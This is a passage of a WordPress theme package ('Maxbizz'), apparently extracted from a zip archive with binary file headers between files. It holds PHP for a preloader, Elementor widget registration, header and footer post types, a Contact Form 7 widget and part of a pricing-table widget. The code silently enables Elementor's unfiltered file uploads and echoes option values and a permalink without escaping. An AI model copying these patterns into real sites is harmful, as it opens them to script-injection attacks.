	);

	$settings['panels']   = apply_filters( 'maxbizz_customize_panels', $panels );
	$settings['sections'] = apply_filters( 'maxbizz_customize_sections', $sections );
	$settings['fields']   = apply_filters( 'maxbizz_customize_fields', $fields );

	return $settings;
}

$maxbizz_customize = new Maxbizz_Customize( preloader_customize_settings() );

if( maxbizz_get_option('preload') != false ){

    function maxbizz_body_classes( $classes ) {

    	$classes[] = 'royal_preloader';

    	return $classes;
    }
    add_filter( 'body_class', 'maxbizz_body_classes' );

    function maxbizz_preload_body_open_script() {
        echo '<div id="royal_preloader" data-width="'.maxbizz_get_option('preload_logo_width').'" data-height="'.maxbizz_get_option('preload_logo_height').'" data-url="'.maxbizz_get_option('preload_logo').'" data-color="'.maxbizz_get_option('preload_text_color').'" data-bgcolor="'.maxbizz_get_option('preload_bgcolor').'"></div>';
        
    }
    add_action( 'wp_body_open', 'maxbizz_preload_body_open_script' );

    function maxbizz_preload_scripts() {
    	wp_enqueue_style('maxbizz-preload', get_template_directory_uri().'/css/royal-preload.css');
    }
    add_action( 'wp_enqueue_scripts', 'maxbizz_preload_scripts' );

}PK�8FZqڋ  #inc/backend/elementor/elementor.phpnu�[���<?php

// Load the theme's custom Widgets so that they appear in the Elementor element panel.
add_action( 'elementor/widgets/widgets_registered', 'maxbizz_register_elementor_widgets' );
function maxbizz_register_elementor_widgets() {

    require_once( get_template_directory() . '/inc/backend/elementor/widgets/widgets.php' );
    require_once( get_template_directory() . '/inc/backend/elementor/widgets/header/widgets.php' );

}

// Add a custom 'category_maxbizz' category for to the Elementor element panel so that our theme's widgets have their own category.
add_action( 'elementor/init', function() {
    \Elementor\Plugin::$instance->elements_manager->add_category( 
        'category_maxbizz',
        [
            'title' => __( 'Maxbizz', 'maxbizz' ),
            'icon' => 'fa fa-plug', //default icon
        ],
        1 // position
    );
    \Elementor\Plugin::$instance->elements_manager->add_category( 
        'category_maxbizz_header',
        [
            'title' => __( 'OT Header', 'maxbizz' ),
            'icon' => 'fa fa-plug', //default icon
        ],
        2 // position
    );
});

// Post types with Elementor
function maxbizz_add_cpt_support() {
    
    //if exists, assign to $cpt_support var
    $cpt_support = get_option( 'elementor_cpt_support' );
    
    //check if option DOESN'T exist in db
    if( ! $cpt_support ) {
        $cpt_support = [ 'page', 'post', 'ot_portfolio', 'ot_header_builders', 'ot_footer_builders' ]; //create array of our default supported post types
        update_option( 'elementor_cpt_support', $cpt_support ); //write it to the database
    }
    
    //if it DOES exist, but portfolio is NOT defined
    else {
        $ot_portfolio       = in_array( 'ot_portfolio', $cpt_support );
        $ot_header_builders = in_array( 'ot_header_builders', $cpt_support );
        $ot_footer_builders = in_array( 'ot_footer_builders', $cpt_support );
        if( !$ot_portfolio ){
            $cpt_support[] = 'ot_portfolio'; //append to array
        }
        if( !$ot_header_builders ){
            $cpt_support[] = 'ot_header_builders'; //append to array
        }
        if( !$ot_footer_builders ){
            $cpt_support[] = 'ot_footer_builders'; //append to array
        }
        update_option( 'elementor_cpt_support', $cpt_support ); //update database
    }
    
    //otherwise do nothing, portfolio already exists in elementor_cpt_support option
}
add_action( 'elementor/init', 'maxbizz_add_cpt_support' );

// Upload SVG for Elementor
function maxbizz_unfiltered_files_upload() {
    
    //if exists, assign to $cpt_support var
    $cpt_support = get_option( 'elementor_unfiltered_files_upload' );
    
    //check if option DOESN'T exist in db
    if( ! $cpt_support ) {
        $cpt_support = '1'; //create string value default to enable upload svg
        update_option( 'elementor_unfiltered_files_upload', $cpt_support ); //write it to the database
    }
}
add_action( 'elementor/init', 'maxbizz_unfiltered_files_upload' );

// Header post type
add_action( 'init', 'maxbizz_create_header_builder' ); 
function maxbizz_create_header_builder() {
    register_post_type( 'ot_header_builders',
        array(
            'labels' => array(
                'name' => 'Header Builders',
                'singular_name' => 'Header Builder',
                'add_new' => 'Add New',
                'add_new_item' => 'Add New Header Builder',
                'edit' => 'Edit',
                'edit_item' => 'Edit Header Builder',
                'new_item' => 'New Header Builder',
                'view' => 'View',
                'view_item' => 'View Header Builder',
                'search_items' => 'Search Header Builders',
                'not_found' => 'No Header Builders found',
                'not_found_in_trash' => 'No Header Builders found in Trash',
                'parent' => 'Parent Header Builder'
            ),
            'hierarchical' => false,
            'public' => true,
            'show_ui' => true,
            'menu_position' => 60,
            'supports' => array( 'title', 'editor' ),
            'menu_icon' => 'dashicons-editor-kitchensink',
            'publicly_queryable' => true,
            'exclude_from_search' => false,
            'has_archive' => true,
            'query_var' => true,
            'can_export' => true,
            'capability_type' => 'post'
        )
    );
}

// Footer post type
add_action( 'init', 'maxbizz_create_footer_builder' ); 
function maxbizz_create_footer_builder() {
    register_post_type( 'ot_footer_builders',
        array(
            'labels' => array(
                'name' => 'Footer Builders',
                'singular_name' => 'Footer Builder',
                'add_new' => 'Add New',
                'add_new_item' => 'Add New Footer Builder',
                'edit' => 'Edit',
                'edit_item' => 'Edit Footer Builder',
                'new_item' => 'New Footer Builder',
                'view' => 'View',
                'view_item' => 'View Footer Builder',
                'search_items' => 'Search Footer Builders',
                'not_found' => 'No Footer Builders found',
                'not_found_in_trash' => 'No Footer Builders found in Trash',
                'parent' => 'Parent Footer Builder'
            ),
            'hierarchical' => false,
            'public' => true,
            'show_ui' => true,
            'menu_position' => 60,
            'supports' => array( 'title', 'editor' ),
            'menu_icon' => 'dashicons-editor-kitchensink',
            'publicly_queryable' => true,
            'exclude_from_search' => false,
            'has_archive' => true,
            'query_var' => true,
            'can_export' => true,
            'capability_type' => 'post'
        )
    );
}

/*Fix Elementor Pro*/
function maxbizz_register_elementor_locations( $elementor_theme_manager ) {

    $elementor_theme_manager->register_all_core_location();

}
add_action( 'elementor/theme/register_locations', 'maxbizz_register_elementor_locations' );

/*** add options to sections ***/
add_action('elementor/element/section/section_structure/after_section_end', function( $section, $args ) {

    /* header options */
    $section->start_controls_section(
        'header_custom_class',
        [
            'label' => __( 'For Header', 'maxbizz' ),
            'tab' => \Elementor\Controls_Manager::TAB_LAYOUT,
        ]
    );
    $section->add_control(
        'sticky_class',
        [
            'label'        => __( 'Sticky On/Off', 'maxbizz' ),
            'type'         => Elementor\Controls_Manager::SWITCHER,
            'return_value' => 'is-fixed',
            'prefix_class' => '',
        ]
    );
    $section->add_control(
        'sticky_background',
        [
            'label'     => __( 'Background Scroll', 'maxbizz' ),
            'type'      => Elementor\Controls_Manager::COLOR,
            'selectors' => [
                '{{WRAPPER}}.elementor-section.is-stuck' => 'background: {{VALUE}};',
            ],
            'condition' => [
                'sticky_class' => 'is-fixed',
            ],
        ]
    );
    $section->add_responsive_control(
        'offset_space',
        [
            'label' => __( 'Offset', 'maxbizz' ),
            'type' => Elementor\Controls_Manager::SLIDER,
            'range' => [
                'px' => [
                    'min' => 0,
                    'max' => 200,
                ],
            ],
            'selectors' => [
                '{{WRAPPER}}.is-stuck' => 'top: {{SIZE}}{{UNIT}};',
                '.admin-bar {{WRAPPER}}.is-stuck' => 'top: calc({{SIZE}}{{UNIT}} + 32px);',
            ],
            'condition' => [
                'sticky_class' => 'is-fixed',
            ],
        ]
    );

    $section->end_controls_section();

}, 10, 2 );

/*** add options to columns ***/
if ( did_action( 'elementor/loaded' ) ) {
    require get_template_directory() . '/inc/backend/elementor/column.php';
}PK�8FZ�FE�Y	Y	 inc/backend/elementor/column.phpnu�[���<?php

use Elementor\Controls_Stack;
use Elementor\Controls_Manager;
use Elementor\Element_Column;
use Elementor\Core\Base\Module;

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

class OT_Element_Column extends Module {

	public function __construct() {

		$this->add_actions();
	}

	public function get_name() {
		return 'ot-content-align';
	}

	/**
	 * @param $element    Controls_Stack
	 * @param $section_id string
	 */
	public function register_controls( Controls_Stack $element, $section_id ) {
		if ( ! $element instanceof Element_Column ) {
			return;
		}
		$required_section_id = 'layout';

		if ( $required_section_id !== $section_id ) {
			return;
		}

		$element->add_responsive_control(
			'_ot_column_min_width',
			[
				'label'        => esc_html__( 'Min Width (px)', 'maxbizz' ),
				'type'      => Controls_Manager::SLIDER,
				'default'   => [
					'unit' => 'px',
				],
				'range'     => [
					'px' => [
						'min' => 0,
						'max' => 500,
					],
				],
				'device_args'     => [
					Controls_Stack::RESPONSIVE_DESKTOP => [
						'selectors' => [
							'{{WRAPPER}}' => 'min-width: {{SIZE}}{{UNIT}}',
						],
					],
					Controls_Stack::RESPONSIVE_TABLET => [
						'selectors' => [
							'{{WRAPPER}}' => 'min-width: {{SIZE}}{{UNIT}}',
						],
					],
					Controls_Stack::RESPONSIVE_MOBILE => [
						'selectors' => [
							'{{WRAPPER}}' => 'min-width: {{SIZE}}{{UNIT}}',
						],
					],
				],
				'separator' => 'before',
			]
		);

		$element->add_control(
			'_ot_content_align',
			[
				'label'        => esc_html__( 'Content Align', 'maxbizz' ),
				'type'         => Controls_Manager::CHOOSE,
				'options'      => [
					'vertical'   => [
						'title' => esc_html__( 'Vertical', 'maxbizz' ),
						'icon'  => 'fa fa-ellipsis-v',
					],
					'horizontal' => [
						'title' => esc_html__( 'Horizontal', 'maxbizz' ),
						'icon'  => 'fa fa-ellipsis-h',
					],
				],
				'default'      => 'vertical',
				'prefix_class' => 'ot-flex-column-',
			]
		);

		$element->update_control(
			'content_position',
			['prefix_class' => 'ot-column-items-',]
		);
	}

	protected function add_actions() {
		add_action( 'elementor/element/before_section_end', [ $this, 'register_controls' ], 10, 2 );
	}
}

new OT_Element_Column();
PK�8FZ�"�`""/inc/backend/elementor/widgets/contact-form7.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Elementor Style for header
 *
 *
 * @since 1.0.0
 */

/**
 * Widget Name: Contact Form 7 
 */

class Maxbizz_Contact_Form_7 extends Widget_Base {   //this name is added to plugin.php of the root folder

	public function get_name() {
		return 'ictf7';
	}

	public function get_title() {
		return 'OT Contact Form';   // title to show on elementor
	}

	public function get_icon() {
		return 'eicon-mail';    //   eicon-posts-ticker-> eicon ow asche icon to show on elelmentor
	}

	public function get_categories() {
		return [ 'category_maxbizz' ];    // category of the widget
	}

	/**
	 * A list of scripts that the widgets is depended in
	 * @since 1.3.0
	 **/
	protected function _register_controls() {
			
		//start of a control box
		$this->start_controls_section(
			'section_content',
			[
				'label' => esc_html__( 'Contact Form 7', 'maxbizz' ),   //section name for controler view
			]
		);

		$this->add_control(
			'cf7',
			[
				'label' => esc_html__( 'Select Contact Form', 'maxbizz' ),
                'description' => esc_html__('Contact form 7 - plugin must be installed and there must be some contact forms made with the contact form 7','maxbizz'),
				'type' => Controls_Manager::SELECT2,
				'multiple' => false,
				'label_block' => true,
				'options' => $this->get_contact_form_7_posts(),
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'section_redirect',
			[
				'label' => esc_html__( 'After Submit Redirect Setting', 'maxbizz' ),   //section name for controler view
			]
		);

		$this->add_control(
			'cf7_redirect_page',
			[
				'label' => esc_html__( 'On Success Redirect To', 'maxbizz' ),
                'description' => esc_html__('Select a page which you want users to redirect to when the contact fom is submitted and is successful. Leave Blank to Disable','maxbizz'),
				'type' => Controls_Manager::SELECT2,
				'multiple' => false,
				'options' => $this->maxbizz_get_all_pages(),
			]
		);

		$this->end_controls_section();

		$this->start_controls_section(
			'section_style',
			[
				'label' => esc_html__( 'Style Contact Form', 'maxbizz' ),   //section name for controler view
				'tab' => Controls_Manager::TAB_STYLE,
			]
		);

		$this->add_control(
			'css_all_fields',
			[
				'label' => __( 'Global CSS For all fields', 'maxbizz' ),
				'description' => __( 'This is the global css for all fields of cf7. It will not effect the other fileds but if you want to define things such as color, background color use this.', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'color:#000;',
				'selectors' => [
					'{{WRAPPER}} ' => '{{VALUE}}',
				],
			]
		);

		$this->add_control(
			'css_all_label',
			[
				'label' => __( 'All Label CSS', 'maxbizz' ),
				'description' => __( 'Changes might not sometimes show in the live preview but check in the front end to see the changes.', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'color:#fff;',
				'selectors' => [
					'{{WRAPPER}} label' => '{{VALUE}}',
				],
			]
		);	
		$this->add_control(
			'css_all_input',
			[
				'label' => __( 'All Input CSS', 'maxbizz' ),
				'description' => __( 'Changes might not sometimes show in the live preview but check in the front end to see the changes.', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'width:100%;
							      background:red;',
				'selectors' => [
					'{{WRAPPER}} input' => 'height:auto;',
					'{{WRAPPER}} input' => '{{VALUE}}',
					
				],
			]
		);

		$this->add_control(
			'css_text_area',
			[
				'label' => __( 'Textarea CSS', 'maxbizz' ),
				'description' => __( 'Changes might not sometimes show in the live preview but check in the front end to see the changes.', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'height:100px; 
								  width:100%;',
				'selectors' => [
					'{{WRAPPER}} textarea' => 'height:auto;',
					'{{WRAPPER}} textarea' => '{{VALUE}}',
				],
			]
		);

		$this->add_control(
			'css_checkbox',
			[
				'label' => __( 'Checkbox/ Radio CSS', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'display: block;',
				'selectors' => [
					'{{WRAPPER}} .wpcf7-list-item' => '{{VALUE}}',
				],
			]
		);	

		$this->add_control(
			'css_select',
			[
				'label' => __( 'Dropdown/ Select Box css', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'width: 100;',
				'selectors' => [
					'{{WRAPPER}} select' => '{{VALUE}}',
				],
			]
		);	
		$this->add_control(
			'css_selectoptions',
			[
				'label' => __( 'Select Options Css', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'color: red;',
				'selectors' => [
					'{{WRAPPER}} select option' => '{{VALUE}}',
				],
			]
		);		

		$this->add_control(
			'css_file',
			[
				'label' => __( 'File CSS', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'display: block;',
				'selectors' => [
					'{{WRAPPER}} input[type="file"]' => '{{VALUE}}',
				],
			]
		);	
		$this->add_control(
			'css_date',
			[
				'label' => __( 'Date CSS', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'display: block;',
				'selectors' => [
					'{{WRAPPER}} .wpcf7-date' => '{{VALUE}}',
				],
			]
		);	
		$this->add_control(
			'css_input_submit',
			[
				'label' => __( 'Submit Button CSS', 'maxbizz' ),
				'description' => __( 'Changes might not sometimes show in the live preview but check in the front end to see the changes.', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'width:100%; background:red;',
				'selectors' => [
					'{{WRAPPER}} input[type="submit"], {{WRAPPER}} button[type="submit"]' => '{{VALUE}}',
				],
			]
		);		
		$this->add_control(
			'css_input_submit_hover',
			[
				'label' => __( 'Submit Button Hover CSS', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'background:#fff;',
				'selectors' => [
					'{{WRAPPER}} input[type="submit"]:hover' => '{{VALUE}}',
				],
			]
		);

		$this->add_control(
			'css_responce',
			[
				'label' => __( 'response CSS', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'placeholder' => 'color:red;',
				'selectors' => [
					'{{WRAPPER}} .wpcf7-response-output' => '{{VALUE}}',
				],
			]
		);


		$this->end_controls_section();

	}


	protected function render() {
		static $v_veriable=0;

		$settings = $this->get_settings();
        if(!empty($settings['cf7'])){
    	   echo'<div class="elementor-shortcode maxbizz-cf7-'.$v_veriable.'">';
                echo do_shortcode('[contact-form-7 id="'.$settings['cf7'].'"]');    
           echo '</div>';  
    	}

 		if(!empty($settings['cf7_redirect_page'])) {  ?>
 			<script>
 			        var theform = document.querySelector('.maxbizz-cf7-<?php echo $v_veriable; ?>');
						theform.addEventListener( 'wpcf7mailsent', function( event ) {
					    location = '<?php echo get_permalink( $settings['cf7_redirect_page'] ); ?>';
					}, false );
			</script>

		<?php  $v_veriable++;
 		}
    }

    protected function get_contact_form_7_posts(){

	 	$args = array('post_type' => 'wpcf7_contact_form', 'posts_per_page' => -1);

	    $catlist=[];
	    
	    if( $categories = get_posts($args)){
	    	foreach ( $categories as $category ) {
	    		(int)$catlist[$category->ID] = $category->post_title;
	    	}
	    }
	    else{
	        (int)$catlist['0'] = esc_html__('No contect From 7 form found', 'maxbizz');
	    }
	  	return $catlist;
	}

	protected function maxbizz_get_all_pages(){

	  	$args = array('post_type' => 'page', 'posts_per_page' => -1);

	    $catlist=[];
	    
	    if( $categories = get_posts($args)){
	      foreach ( $categories as $category ) {
	        (int)$catlist[$category->ID] = $category->post_title;
	      }
	    }
	    else{
	        (int)$catlist['0'] = esc_html__('No Pages Found!', 'maxbizz');
	    }
	  	return $catlist;
	}

	protected function _content_template() {}
}
// After the Maxbizz_Contact_Form_7 class is defined, I must register the new widget class with Elementor:
Plugin::instance()->widgets_manager->register_widget_type( new Maxbizz_Contact_Form_7() );
PK�8FZt=��==/inc/backend/elementor/widgets/pricing-table.phpnu�[���<?php
namespace Elementor; // Custom widgets must be defined in the Elementor namespace
if ( ! defined( 'ABSPATH' ) ) exit; // Exit if accessed directly (security measure)

/**
 * Widget Name: Pricing Table
 */
class Maxbizz_Pricing_Table extends Widget_Base{

 	// The get_name() method is a simple one, you just need to return a widget name that will be used in the code.
	public function get_name() {
		return 'ipricingtable';
	}

	// The get_title() method, which again, is a very simple one, you need to return the widget title that will be displayed as the widget label.
	public function get_title() {
		return __( 'OT Pricing Table', 'maxbizz' );
	}

	// The get_icon() method, is an optional but recommended method, it lets you set the widget icon. you can use any of the eicon or font-awesome icons, simply return the class name as a string.
	public function get_icon() {
		return 'eicon-price-table';
	}

	// The get_categories method, lets you set the category of the widget, return the category name as a string.
	public function get_categories() {
		return [ 'category_maxbizz' ];
	}

	protected function _register_controls() {

		//Content Service box
		$this->start_controls_section(
			'content_section',
			[
				'label' => __( 'Pricing Table', 'maxbizz' ),
			]
		);

		$this->add_control(
			'is_featured',
			[
				'label' => __( 'Pricing Table Featured', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Yes', 'maxbizz' ),
				'label_off' => __( 'No', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => '',
			]
		);

		$this->add_control(
			'title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'Standard', 'maxbizz' ),
				'label_block' => true,
			]
		);

		$this->add_control(
			'price',
			[
				'label' => __( 'Price', 'maxbizz' ),
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( '<sup>$</sup> 29', 'maxbizz' ),
				'label_block' => true,
			]
		);

		$this->add_control(
			'price_for',
			[
				'label' => __( 'Text Under Price', 'maxbizz' ),
				'type' => Controls_Manager::TEXT,
				'default' => __( 'per m2', 'maxbizz' ),
				'label_block' => true,
			]
		);

		$this->add_control(
			'short_text',
			[
				'label' => 'Short Text',
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Discover the emerging technologies most relevant to your strategy by working.', 'maxbizz' ),
			]
		);

		$this->add_control(
			'details',
			[
				'label' => 'Details',
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( '<ul><li class="active">Structure of a project</li><li class="active">Measurement of the room</li><li>3D-Visualization of premises</li></ul>', 'maxbizz' ),
			]
		);

		$this->add_control(
			'label_link',
			[
				'label' => 'Button',
				'type' => Controls_Manager::TEXTAREA,
				'default' => __( 'Choose Plane', 'maxbizz' ),
			]
		);

		$this->add_control(
			'link',
			[
				'label' => __( 'Link', 'maxbizz' ),
				'type' => Controls_Manager::URL,
				'placeholder' => __( 'https://your-link.com', 'maxbizz' ),
				'condition' => [
					'label_link!' => '',
				],
			]
		);

		$this->end_controls_section();

		//Style
		$this->start_controls_section(
			'style_table_section',
			[
				'label' => __( 'Table', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);
		$this->add_responsive_control(
			'box_padding',
			[
				'label' => __( 'Padding Box', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', 'em', '%' ],
				'selectors' => [
					'{{WRAPPER}} .inner-table' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'radius_box',
			[
				'label' => __( 'Border Radius', 'maxbizz' ),
				'type' => Controls_Manager::DIMENSIONS,
				'size_units' => [ 'px', '%' ],
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table' => 'border-radius: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'bg_box',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .inner-table' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Border::get_type(),
			[
				'name' => 'box_border',
				'selector' => '{{WRAPPER}} .inner-table',
			]
		);		
		$this->add_group_control(
			Group_Control_Box_Shadow::get_type(),
			[
				'name' => 'ibox_box_shadow',
				'selector' => '{{WRAPPER}} .ot-pricing-table',
				'separator' => 'before',
			]
		);
		
		$this->end_controls_section();
		
		$this->start_controls_section(
			'style_content_section',
			[
				'label' => __( 'Content', 'maxbizz' ),
				'tab'   => Controls_Manager::TAB_STYLE,
			]
		);

		//Title
		$this->add_control(
			'heading_title',
			[
				'label' => __( 'Title', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'title_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .title-table' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'title_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .title-table span' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_control(
			'title_bgcolor',
			[
				'label' => __( 'Background', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .title-table span' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'title_typography',
				'selector' => '{{WRAPPER}} .title-table span',
			]
		);

		//Price
		$this->add_control(
			'heading_price',
			[
				'label' => __( 'Price', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'price_space',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table h2, {{WRAPPER}} .inner-table > p' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'price_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table h2' => 'color: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'price_typography',
				'selector' => '{{WRAPPER}} .ot-pricing-table h2',
			]
		);

		//Under Price
		$this->add_control(
			'heading_price_for',
			[
				'label' => __( 'Under Price', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_control(
			'price_for_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .inner-table > p' => 'color: {{VALUE}};',
					'{{WRAPPER}} .inner-table > p:before' => 'background: {{VALUE}};',
				]
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'price_for_typography',
				'selector' => '{{WRAPPER}} .inner-table > p',
			]
		);

		//Short Text
		$this->add_control(
			'heading_stext',
			[
				'label' => __( 'Short Text', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'stext_spacing',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .short-text' => 'margin-bottom: {{SIZE}}{{UNIT}};',
				],
			]
		);
		$this->add_control(
			'stext_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .short-text' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'stext_typography',
				'selector' => '{{WRAPPER}} .ot-pricing-table .short-text',
			]
		);	

		//Details
		$this->add_control(
			'heading_des',
			[
				'label' => __( 'Details', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
			]
		);
		$this->add_responsive_control(
			'des_padding',
			[
				'label' => __( 'Spacing', 'maxbizz' ),
				'type' => Controls_Manager::SLIDER,
				'range' => [
					'px' => [
						'min' => 0,
						'max' => 100,
					],
				],
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .details' => 'padding: {{SIZE}}{{UNIT}} 0;',
				],
			]
		);
		$this->add_control(
			'des_border_color',
			[
				'label' => __( 'Line Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .details' => 'border-color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'des_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .details ul li' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_control(
			'des_active_color',
			[
				'label' => __( 'Active Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .details ul li.active' => 'color: {{VALUE}};',
				],
			]
		);
		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'des_typography',
				'selector' => '{{WRAPPER}} .ot-pricing-table .details',
			]
		);
		$this->add_control(
			'icon_list',
			[
				'label' => __( 'Icon List', 'maxbizz' ),
				'type' => Controls_Manager::SWITCHER,
				'label_on' => __( 'Yes', 'maxbizz' ),
				'label_off' => __( 'No', 'maxbizz' ),
				'return_value' => 'yes',
				'default' => 'yes',
			]
		);	

		//Button
		$this->add_control(
			'heading_btn',
			[
				'label' => __( 'Button', 'maxbizz' ),
				'type' => Controls_Manager::HEADING,
				'separator' => 'before',
				'condition' => [
					'label_link!' => '',
				],
			]
		);

		$this->add_group_control(
			Group_Control_Typography::get_type(),
			[
				'name' => 'btn_typography',
				'selector' => '{{WRAPPER}} .ot-pricing-table .octf-btn',
				'condition' => [
					'label_link!' => '',
				],
			]
		);

		$this->start_controls_tabs( 'tabs_btn_style' );
		$this->start_controls_tab(
			'tab_btn_normal',
			[
				'label' => __( 'Normal', 'maxbizz' ),
				'condition' => [
					'label_link!' => '',
				],
			]
		);

		$this->add_control(
			'btn_bg_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .octf-btn' => 'background: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'btn_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .octf-btn' => 'color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'btn_bcolor',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .octf-btn' => 'border-color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->end_controls_tab();

		$this->start_controls_tab(
			'tab_btn_hover',
			[
				'label' => __( 'Hover', 'maxbizz' ),
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'hover_btn_bg_color',
			[
				'label' => __( 'Background Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .octf-btn:hover' => 'background: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'hover_btn_color',
			[
				'label' => __( 'Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .octf-btn:hover' => 'color: {{VALUE}};',
				],
				'condition' => [
					'label_link!' => '',
				],
			]
		);
		$this->add_control(
			'hover_btn_bcolor',
			[
				'label' => __( 'Border Color', 'maxbizz' ),
				'type' => Controls_Manager::COLOR,
				'default' => '',
				'selectors' => [
					'{{WRAPPER}} .ot-pricing-table .octf-btn:hover' => 'border-color: {{VALUE}};',
				],
				'condition' => [
